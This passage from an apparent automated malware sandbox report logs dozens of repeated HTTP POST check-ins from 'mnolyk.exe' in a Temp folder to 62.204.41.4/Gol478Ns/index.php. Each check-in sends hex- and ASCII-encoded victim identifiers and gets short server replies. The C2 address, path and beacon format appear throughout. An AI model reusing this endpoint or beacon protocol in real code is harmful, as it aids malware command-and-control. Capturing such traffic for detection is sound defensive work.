                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:02.763273954 CET701INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        501192.168.2.55019162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:02.948024988 CET701OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:03.012465954 CET702INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        502192.168.2.55019262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:03.186395884 CET702OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:03.250641108 CET703INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        503192.168.2.55019362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:03.417591095 CET703OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:03.482860088 CET704INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        504192.168.2.55019462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:03.649008036 CET704OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:03.710764885 CET705INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        505192.168.2.55019562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:03.888103962 CET705OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:03.951908112 CET706INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        506192.168.2.55019662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:04.123384953 CET706OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:04.188596964 CET707INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        507192.168.2.55019762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:04.369822979 CET707OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:04.433660030 CET708INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        508192.168.2.55019862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:04.619859934 CET708OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:04.683567047 CET709INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        509192.168.2.55019962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:04.853143930 CET709OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:04.915909052 CET710INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        51192.168.2.54974162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:53.261441946 CET252OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:53.329667091 CET252INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        510192.168.2.55020062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:05.093128920 CET710OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:05.158956051 CET711INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        511192.168.2.55020162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:05.341830969 CET711OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:05.408659935 CET712INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        512192.168.2.55020262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:05.591073990 CET712OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:05.656107903 CET713INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        513192.168.2.55020362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:05.828473091 CET713OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:05.892863035 CET714INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        514192.168.2.55020462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:06.078376055 CET714OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:06.144231081 CET715INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        515192.168.2.55020562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:06.323849916 CET715OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:06.389614105 CET716INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        516192.168.2.55020662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:06.573237896 CET716OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:06.638559103 CET717INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        517192.168.2.55020762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:06.819267988 CET717OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:06.884358883 CET718INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        518192.168.2.55020862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:07.190881014 CET718OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:07.259404898 CET719INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        519192.168.2.55020962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:07.475846052 CET719OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
